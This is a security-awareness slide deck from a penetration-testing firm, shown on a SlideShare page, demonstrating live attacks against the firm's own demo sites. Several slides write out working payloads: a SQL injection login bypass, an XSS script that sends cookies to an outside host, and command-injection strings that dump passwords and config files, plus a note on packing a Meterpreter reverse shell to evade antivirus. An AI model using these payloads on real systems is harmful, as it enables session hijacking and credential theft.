Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Взлом в прямом эфире: как хакеры проникают в ваши системы

290 views

Published on

Инциденты информационной безопасности в последнее время подчеркнуто демонстрируют, что IT-системы даже в международных высокотехнологичных компаниях и крупных государственных учреждениях не имеют достаточной защиты. Широко распространенных мер тестирования IT может быть достаточно для защиты 99% систем. Однако решающим фактором является то, что оставшийся один процент остается целью цифровых атак. Любой лазейки, какой бы незначительной она ни была, достаточно для того, чтобы хорошо защищенная по всем остальным параметрам IT-инфраструктура оказалась уязвимой в целом. Во время презентации докладчик проведет различные атаки на IT-системы. Он покажет, как невероятно просто можно обойти защитные меры для получения доступа к конфиденциальной информации.

Published in: Technology
  • Be the first to comment

Взлом в прямом эфире: как хакеры проникают в ваши системы

  1. 1. Page 1SySS GmbH14/06/16 LIVE HACKING
  2. 2. Page 2SySS GmbH14/06/16 AGENDA 1. DOS attack against an internet web server 2. Deactivating burglar alarm 3. Attacking wireless keyboards 4. Mobile App and Web Service 5. SMS spoofing and identity theft 6. Attacks against crypto usb sticks 7. Smartphone trojan / SIM bug 8. Hardware hacker tools If time 1. USB attacks 2. Evading antivirus 3. SQL Injection
  3. 3. Page 3SySS GmbH14/06/16 ABOUT THE SPEAKER Dipl.-Inform. Sebastian Schreiber Managing Director of SySS GmbH +49 (0)7071 - 40 78 56-0 sebastian.schreiber@syss.de
  4. 4. Page 4SySS GmbH14/06/16 ABOUT SYSS GMBH Founded in 1998 At present: about 80 employees Based in Tübingen, southwest Germany Operating worldwide, focusing on Germany Rapidly growing: new campus providing space for 280 „Pentest Experts“ is under construction Services Penetration Testing & Security Analyses (95%) Incident Response/ Training/ Live Hacking Presentations (5%)
  5. 5. Page 5SySS GmbH14/06/16 SELECTED INCIDENCES 2015 04/2015: „Russian Hackers Read Obama‘s Unclassified Emails“ – nytimes.com 05/2015: „IT Incident Deutscher Bundestag“ – tagesschau.de 07/2015: „Hacker remotely take over a Jeep Cherokee“ – heise.de 07/2015: „Hackers can disable a sniper rifle – or change its target“ – wired.de 07/2015: „Surveillance software: Hacking Team becoming Hacked Team“ – heise.de 08/2015: „Ashley Madison Dating Portal: Hacker stealing 11,2 Mio. passwords“ – golem.de 09/2015: „Cyber crime: Robbing fingerprints of more then five million US government employees” – wired.de 10/2015: „USA: Hacker stealing data about millions of T-Mobile customers “ – Spiegel.de 10/2015: „Online banking: New ways of attacking German mTAN“ – heise.de
  6. 6. Page 6SySS GmbH14/06/16 GOOGLE HACKING Filetype:sql phpmyadmin wp_users inurl:warenkorb inurl:preis
  7. 7. Page 7SySS GmbH14/06/16 LIVE-HACK HOTEL peter/peter http://www.live-hack.de/xss/xss.php Admin / passwort
  8. 8. Page 8SySS GmbH14/06/16 SQL INJECTION IN LOG-IN FORMS SELECT * FROM users WHERE user='peter' AND password='peter‘ peter' OR 1=1# http://www.live-hack.de/xss/xss.php SELECT * FROM users WHERE user='peter' OR 1=1#' AND password='peter’
  9. 9. Page 9SySS GmbH14/06/16 DENIAL OF SERVICE (DOS) http://www.live-hack.de/clock.php Angriff: /home/livehack/thc/run.sh
  10. 10. Page 10SySS GmbH14/06/16 iPHONE/iPAD HACKS
  11. 11. Page 11SySS GmbH14/06/16 ANTIVIRUS EVASION (1/2) How antivirus software works Blacklisting Whitelisting Blacklisting: How it works and its weak points Signature based: Searching for known patterns Unknown
  12. 12. Page 12SySS GmbH14/06/16 ANTIVIRUS EVASION (2/2) Blacklisting: How it works and its weak points Signature-based: Searching for known patterns Unknown malware will not be detected Polymorphic malware has already been used for a long time to outsmart signature- based detection Behavior-based: Software is classified as harmless or harmful according to its behavior In general, rule-based technologies in combination with scoring procedures and fixed thresholds concerning calculated scores (heuristic procedures) Static code analysis: It is only possible to check code directly accessible within an executable file Dynamic code analysis during runtime (sandbox environment): Various limitations given by the sandbox environment (e.g., period of time, specific user actions like mouse clicks etc.)
  13. 13. Page 13SySS GmbH14/06/16 ANTIVIRUS EVASION: LIVE DEMONSTRATION Free-of-charge malware protection for end-users and small business Uses the same technology and scan engine as System Center 2012 Endpoint Protection (formerly Forefront Endpoint Protection) Example for antivirus software: Microsoft Security Essentials Using the following antivirus evasion methods: Polymorphism Encryption + compression Detection of sandbox environments Malware: Meterpreter Shell (windows/meterpreter/reverse_https) of Metasploit Framework Creating an executable file containing known malware using the software “ShCoLo” by SySS GmbH
  14. 14. Page 14SySS GmbH14/06/16 ANTIVIRUS EVASION: TEST RESULTS Product Version Date of virus definition file Operating system(s) of target systems Avira AntiVir Professional 10.2.0.1064 21.05.2013 Windows XP SP 3 (32 Bit) Windows 7 SP 1 (64 Bit) AVG Free 2013.0.2904 20.05.2013 Windows XP SP 3 (32 Bit) Kaspersky Endpoint Protection Workstation 8.1.0.831 21.05.2013 Windows XP SP 3 (32 Bit) McAfee SaaS Endpoint Protection 5400.1158 20.05.2013 Windows 7 SP 1 (64 Bit) Microsoft Security Essentials 4.1.522.0 21.05.2013 Windows XP SP 3 (32 Bit) Sophos Endpoint Security and Control 10.2 21.05.2013 Windows XP SP 3 (32 Bit) Symantec Endpoint Protection 12.1.1101.401 27.05.2013 Windows 7 SP 1 (64 Bit)
  15. 15. Page 15SySS GmbH14/06/16 MOBILE PHONE TROJAN Symbian phone: 0049-177-6397937 SMS forwarding Activate the microphone Reboot Location info
  16. 16. Page 16SySS GmbH14/06/16 FIPS 140-2 CERTIFIED CRYPTO USB STICKS (1/2)
  17. 17. Page 17SySS GmbH14/06/16 FIPS 140-2 CERTIFIED CRYPTO USB STICKS (2/2)
  18. 18. Page 18SySS GmbH14/06/16 ACTIONABLE TAKEAWAYS Be aware of digital attacks 24/7 Try to think like a hacker when applying IT safety measures Perform security assessments like penetration tests Stay alert and retest your IT security on regular basis Remember: The next vulnerability could just be found while attending this session
  19. 19. Page 19SySS GmbH14/06/16 XSS <script>window.open('http://www.syss.de/cookie.html?'+document.cookie)</scr ipt>
  20. 20. Page 20SySS GmbH14/06/16 INJECTIONS, PHP MAGIC QUOTES http://livehack.syss.de/infoboard/index.php?mod=search Search for, e.g., “SySS” Search for !"§$%&/()=?`‘‚ Conclusio: PHP Magic Quotes Search for SySS $(sleep 4) $(grep -r -i password * > /tmp/passwd) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../. ./../tmp/passwd Search for $(cat inc/userdata.inc.php | base64 > /tmp/userdata.txt) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../. ./../tmp/userdata.txt
  21. 21. Page 21SySS GmbH14/06/16 QUIZDUELL Opponent: lhtest2
  22. 22. Page 22SySS GmbH14/06/16 Thank you very much for your attention! SySS – The Pentest Experts Sebastian Schreiber, Managing Director sebastian.schreiber@syss.de

×